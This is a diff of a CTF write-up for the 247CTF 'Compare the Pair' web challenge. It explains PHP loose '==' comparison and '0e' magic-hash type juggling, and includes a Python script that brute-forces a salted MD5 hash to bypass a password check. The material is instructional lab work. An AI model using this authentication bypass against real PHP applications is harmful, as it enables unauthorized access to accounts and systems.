SiTouhemi/Web-write-ups/247CTF_COMPARE THE PAIR-web/247CTF_COMPARE THE PAIR-web.md

 The vulnerability occurs in the == comparison.

 ### 3. Understanding the Vulnerability

-In PHP, the comparison operator == checks two values for equality, performing type juggling.
-This means PHP attempts to convert the values to a common type before making the comparison.
+In PHP, the comparison operator == is used to compare two values for equality.
+It checks if the values are equal after performing type juggling, which means PHP will try to convert the values to a common type before making the comparison.

-Key Points About == in PHP:
+#### Key Points About == in PHP:

+1. **Type Juggling**: PHP automatically converts the data types of the operands to a common type when using ==.
+For example:

+php
+   if (5 == "5") {
+       echo "Equal";
+   }

-Type Juggling: PHP automatically converts operand data types when using ==.
-For example: php if (5 == "5") { echo "Equal"; } Here, "5" (a string) is converted to an integer, so the comparison returns true.
+   In this case, "5" (a string) is converted to an integer, so the comparison 5 == "5" returns true.

-Loose Comparison: == is known as a "loose comparison."
-For instance: php if (0 == false) { echo "Equal"; } In this case, 0 is equivalent to false, returning true.
+2. **Loose Comparison**: Because of type juggling, == is known as a "loose comparison."
+For example:

-Common Pitfalls:
+php
+   if (0 == false) {
+       echo "Equal";
+   }

+   Here, 0 is considered equivalent to false, so the comparison returns true.

+3. **Common Pitfalls**:
-Comparing different types can yield unexpected results: php if ("0" == false) { echo "Equal"; } Here, the string "0" is treated as false, leading to a true comparison.
+   - Comparing different types can lead to unexpected results:

+php
+     if ("0" == false) {
+         echo "Equal";
+     }

+     The string "0" is treated as false when loosely compared, so this would also return true.

-Additionally, the format of $password_hash resembles a large number starting with 0e....
-When 0e1234 is compared using ==, PHP treats it as the number 0:
+Also, we can see that the format of the $password_hash looks like a very large number starting with 0e....

+When you compare a string like 0e1234 to other values using ==, PHP treats 0e1234 as a number, specifically the number 0.
+This can lead to surprising results:

+php
 if ("0e1234" == 0) {
     echo "Equal";
 } else {
     echo "Not Equal";
 }

-Output: "Equal"
+**Output**: "Equal"

 ### 4. Exploiting the Vulnerability

-The vulnerability is clear: we need to find a password such that when concatenated with $salt, its md5 hash generates a string that appears like a large number (starts with 0e followed by digits).
+The vulnerability is clear now: all we have to do is find a password that, when concatenated with $salt, its md5 hash generates a string that looks like a large number (starts with 0e and the rest are numbers).

-Here's a Python script to help with this:

-from itertools import product
-import hashlib
+I didn't know how to create the code that could help us, but I found a code in another write-up:

+python
+from itertools import product  # Import the product function from itertools to generate combinations import hashlib  # Import the hashlib module for generating MD5 hashes

+# Iterate through different lengths of the combination
-for x in range(0, 10):
+for x in range(0, 10):  # Loop over lengths from 0 to 9 (inclusive)
+    # Generate all possible combinations of the alphabet with the current length 'x'
     for combo in product("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", repeat=x):
+        # Create the string to hash by appending the current combination to the fixed string
         result = hashlib.md5(("f789bbc328a3d1a3" + ''.join(combo)).encode()).hexdigest()

+        # Check if the resulting hash has the desired properties
-        if result.startswith("0e") and result[2:].isdigit():
+        if result.startswith("0e") and result[2:].isdigit():  # Look for a hash that starts with '0e' and is followed only by digits
+            # If a matching hash is found, print the string that generated it
             print("f789bbc328a3d1a3" + ''.join(combo))
+        else:
+            pass  # If the hash doesn't match the criteria, do nothing and continue

-Any resulting password can be sent to the server as ?password=xxxxxx.
-Finally, we can retrieve the flag!
+Any result we get, we send it to the server with ?password=xxxxxx.
+Finally, we get the flag!

 ### Resources